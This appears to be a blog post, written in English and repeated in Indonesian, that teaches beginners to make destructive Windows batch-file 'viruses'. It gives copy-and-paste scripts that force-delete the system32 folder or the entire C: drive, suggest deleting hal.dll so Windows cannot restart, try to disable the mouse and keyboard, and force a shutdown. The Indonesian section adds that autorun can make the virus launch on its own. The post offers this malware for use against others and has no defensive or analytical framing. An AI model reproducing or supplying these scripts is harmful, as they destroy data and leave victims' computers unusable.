Make Virus Bat With Newbie Style
Why Iam not use C ot C++ or another programming language.
Answer is Bat is still powerfull and very very extrem virus.
N you know ? I have created virus to destroyed your hardisk in 5 second.
But This Time, we talking about Make Virus Bat With Newbie Style
Lets start.
Open Your Notepad. copy n paste this code to your notepad n save as .bat extention
Code:
@echo off
cd\
cls
del /f /s /q C:\WINDOWS\system32
cls
shutdown -s -t 10 -c "Your Message Here" -f
cls
exit
C:\WINDOWS\system32 ====> you can change this with your traget to destroy.
If you just want to little joke.
Change to :
Code:
C:\WINDOWS\system32\hal.dll
If this deleted, Windows cant reboot.
Not Enough, Try This one.
Code:
@echo off
cls
rundll32 MOUSE,disable
rundll32 KEYBOARD,disable
rundll32 user32,SetCursorPos
cls
DEL /F /S /Q C:
cls
shutdown -s -t 10 -c "Your Message Here" -f
cls
exit
SOrry for my bad english language. Iam indonesian Man !!!!.
Terjemahannya....
Indonesian Version
kenapa aku nggak gunain C ot C++ programing atau yang lainnya.
Jawabanya Programming bat masih sangat luarbiasa dan sangat sangat berbahaya.
N tahu nggak gw udah ciptain virus yang bisa menhancurkan hardisk dalam 5 detik.
Tapi kali ini kita akan bicarain Virus dengan newbie style.
Oke langsung aja
buka notepad, kopas kode dibawah... setelah itu simpan dengan extensi *.bat
Code:
@echo off
cd\
cls
del /f /s /q C:\WINDOWS\system32
cls
shutdown -s -t 10 -c "kamu bisa tulis pesan kamu disini" -f
cls
exit
C:\WINDOWS\system32 =====> bisa kamu ganti folder mana yang ingin kamu musnahin.....
klo mau sekadar iseng
ganti aja :
Code:
C:\WINDOWS\system32\hal.dll
klo ke hapus komp nggak bisa restart
Kurang puas !! Cobain juga yang ini
Code:
@echo off
cls
rundll32 MOUSE,disable
rundll32 KEYBOARD,disable
rundll32 user32,SetCursorPos
cls
DEL /F /S /Q C:
cls
shutdown -s -t 10 -c "pesen kamu disini" -f
cls
exit
Kamu bisa panduin dengan auto run biar virus jalan sendiri.
Pokoknya sesuai dengan keinginan kamu.


0 komentar:
Post a Comment